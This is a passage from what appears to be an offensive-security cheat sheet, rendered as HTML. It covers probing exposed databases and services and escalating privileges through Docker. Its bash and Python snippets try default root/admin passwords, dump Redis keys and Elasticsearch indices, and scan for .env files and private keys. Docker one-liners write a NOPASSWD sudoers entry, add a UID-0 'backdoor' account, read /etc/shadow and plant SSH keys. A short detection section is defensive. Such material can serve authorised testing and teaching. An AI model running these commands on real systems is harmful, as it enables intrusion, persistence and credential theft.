&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; probe &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; probes:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;http://target.com/page?name=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;probe&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;49&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 SSTI confirmed: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;probe&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="20-exposed-infrastructure--mysql-redis-ftp-docker" &gt;
&lt;div&gt;
&lt;a href="#20-exposed-infrastructure--mysql-redis-ftp-docker"&gt;
#
&lt;/a&gt;
20. EXPOSED INFRASTRUCTURE — MYSQL, REDIS, FTP, DOCKER
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="201-exposed-mysql-port-3306" &gt;
&lt;div&gt;
&lt;a href="#201-exposed-mysql-port-3306"&gt;
##
&lt;/a&gt;
20.1 Exposed MySQL (Port 3306)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test connectivity&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;timeout &lt;span style="color:#ef9f76"&gt;3&lt;/span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#34;echo &amp;gt; /dev/tcp/&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/3306&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OPEN&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Try connection&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mysql -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; -u root --password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;root
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mysql -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; -u admin --password&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;admin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read banner (without authenticating)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# EOL versions (5.7, 5.6) = multiple unpatched RCE CVEs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Fitness tech company — MySQL 5.7.42 exposed directly to the internet (port 3306), no firewall. Ubuntu 18.04 EOL. Multiple unpatched RCE and privilege escalation CVEs.&lt;/p&gt;
&lt;h3 id="202-exposed-redis-port-6379" &gt;
&lt;div&gt;
&lt;a href="#202-exposed-redis-port-6379"&gt;
##
&lt;/a&gt;
20.2 Exposed Redis (Port 6379)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test without password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;redis-cli -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; PING
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If &amp;#34;PONG&amp;#34; → no password!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Dump all keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;redis-cli -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; KEYS &lt;span style="color:#a6d189"&gt;&amp;#39;*&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read values&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;redis-cli -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; GET &lt;span style="color:#a6d189"&gt;&amp;#34;session:abc123&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="203-exposed-mongodb-port-27017" &gt;
&lt;div&gt;
&lt;a href="#203-exposed-mongodb-port-27017"&gt;
##
&lt;/a&gt;
20.3 Exposed MongoDB (Port 27017)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mongosh &lt;span style="color:#a6d189"&gt;&amp;#34;mongodb://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:27017&amp;#34;&lt;/span&gt; --eval &lt;span style="color:#a6d189"&gt;&amp;#34;db.adminCommand(&amp;#39;listDatabases&amp;#39;)&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="204-exposed-postgresql-port-5432" &gt;
&lt;div&gt;
&lt;a href="#204-exposed-postgresql-port-5432"&gt;
##
&lt;/a&gt;
20.4 Exposed PostgreSQL (Port 5432)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;psql -h &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; -U postgres -d postgres -c &lt;span style="color:#a6d189"&gt;&amp;#34;SELECT version()&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="205-ftp--anonymous-and-brute-force" &gt;
&lt;div&gt;
&lt;a href="#205-ftp--anonymous-and-brute-force"&gt;
##
&lt;/a&gt;
20.5 FTP — Anonymous and Brute Force
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test anonymous&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ftp -n &lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;lt;&amp;lt;EOF
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;user anonymous anonymous
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;ls
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;quit
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt;EOF&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Common users:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# admin, root, backup, ftp, upload, download, www-data, mysql, postgres&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Pure-FTPd, vsFTPd, ProFTPD versions — check CVEs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Electronic monitoring company — FTP server with 14 valid users identified by timing oracle. Rate-limit after multiple attempts. Anonymous disabled.&lt;/p&gt;
&lt;h3 id="206-exposed-coolify-port-3000" &gt;
&lt;div&gt;
&lt;a href="#206-exposed-coolify-port-3000"&gt;
##
&lt;/a&gt;
20.6 Exposed Coolify (Port 3000)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Coolify is a self-hosted PaaS. If exposed, gives full control over deploy and infrastructure.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if it responds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:3000/api/health&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:3000/register&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Open registration?&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:3000/api/settings&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Fitness tech company — Coolify exposed on port 3000 without authentication, API endpoints responding. Compromise would give full control over deploys, databases, and environment variables.&lt;/p&gt;
&lt;h3 id="207-elasticsearch-port-9200" &gt;
&lt;div&gt;
&lt;a href="#207-elasticsearch-port-9200"&gt;
##
&lt;/a&gt;
20.7 Elasticsearch (Port 9200)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Cluster info (no auth)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:9200/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List indices&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:9200/_cat/indices&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Index dump&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$HOST&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:9200/INDEX_NAME/_search?size=100&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="208-port-scanning-on-vps" &gt;
&lt;div&gt;
&lt;a href="#208-port-scanning-on-vps"&gt;
##
&lt;/a&gt;
20.8 Port Scanning on VPS
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;On low-cost VPS, it&amp;rsquo;s common to find ALL these services exposed simultaneously:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;22 → SSH (key-based? password?)
80 → nginx SPA (React/Vue)
443 → HTTPS (same content)
3000 → Coolify, Grafana
3306 → MySQL exposed (no firewall)
5000 → Flask/Werkzeug
5432 → PostgreSQL
6379 → Redis (no password?)
8080 → Tomcat, Jenkins, alternative API
8443 → Apache direct (bypass nginx)
9000 → MinIO, S3-compatible
9090 → Prometheus metrics
9200 → Elasticsearch
27017 → MongoDB
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="21-docker-privilege-escalation" &gt;
&lt;div&gt;
&lt;a href="#21-docker-privilege-escalation"&gt;
#
&lt;/a&gt;
21. DOCKER PRIVILEGE ESCALATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="211-docker-group--root-equivalent" &gt;
&lt;div&gt;
&lt;a href="#211-docker-group--root-equivalent"&gt;
##
&lt;/a&gt;
21.1 Docker Group = Root-Equivalent
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;Users in the &lt;code&gt;docker&lt;/code&gt; group can run containers without sudo. This is root-equivalent on the host:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check if you are in the docker group&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;groups | grep docker
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;getent group docker
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Classic one-liner — add NOPASSWD sudo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /etc:/host_etc -it ubuntu &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bash -c &lt;span style="color:#a6d189"&gt;&amp;#34;echo &amp;#39;username ALL=(ALL) NOPASSWD:ALL&amp;#39; &amp;gt;&amp;gt; /host_etc/sudoers&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Add user with UID 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /etc:/host_etc -it alpine sh -c &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;echo &amp;#39;backdoor::0:0:root:/root:/bin/bash&amp;#39; &amp;gt;&amp;gt; /host_etc/passwd&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Direct chroot to host&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /:/host -it alpine chroot /host /bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Read shadow (offline crack)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /etc:/host_etc -it alpine cat /host_etc/shadow
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Inject SSH key&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /root:/host_root -it alpine sh -c &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;mkdir -p /host_root/.ssh &amp;amp;&amp;amp; echo &amp;#39;ssh-rsa AAAA...&amp;#39; &amp;gt; /host_root/.ssh/authorized_keys&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="212-via-docker-socket" &gt;
&lt;div&gt;
&lt;a href="#212-via-docker-socket"&gt;
##
&lt;/a&gt;
21.2 Via Docker Socket
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If &lt;code&gt;/var/run/docker.sock&lt;/code&gt; is accessible:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ls -la /var/run/docker.sock
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Create privileged container with socket mounted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -v /var/run/docker.sock:/var/run/docker.sock &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -v /:/host -it alpine sh -c &lt;span style="color:#a6d189"&gt;&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; apk add docker-cli &amp;amp;&amp;amp; \
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; docker run --rm -v /:/host alpine chroot /host /bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a6d189"&gt; &amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="213-prior-privesc-detection" &gt;
&lt;div&gt;
&lt;a href="#213-prior-privesc-detection"&gt;
##
&lt;/a&gt;
21.3 Prior Privesc Detection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check suspicious sudoers entries&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;grep &lt;span style="color:#a6d189"&gt;&amp;#34;NOPASSWD&amp;#34;&lt;/span&gt; /etc/sudoers /etc/sudoers.d/*
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check users with UID 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;awk -F: &lt;span style="color:#a6d189"&gt;&amp;#39;$3 == 0 {print $1}&amp;#39;&lt;/span&gt; /etc/passwd
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Check recently added SSH keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;stat /root/.ssh/authorized_keys
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="22-python-snippets--automation" &gt;
&lt;div&gt;
&lt;a href="#22-python-snippets--automation"&gt;
#
&lt;/a&gt;
22. PYTHON SNIPPETS &amp;amp; AUTOMATION
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="221-subdomain--port--path-loop" &gt;
&lt;div&gt;
&lt;a href="#221-subdomain--port--path-loop"&gt;
##
&lt;/a&gt;
22.1 Subdomain + Port + Path Loop
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;domains &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;www.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;api.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;admin.target.com&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ports &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;443&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;8080&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;8443&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;paths &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;/.env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/.git/config&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/storage/oauth-private.key&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;/actuator/env&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;/wp-json/wp/v2/users&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; domain &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; domains:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; port &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; ports:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; scheme &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https&amp;#34;&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; port &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;443&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;8443&lt;/span&gt;] &lt;span style="color:#ca9ee6"&gt;else&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http&amp;#34;&lt;/span&gt;
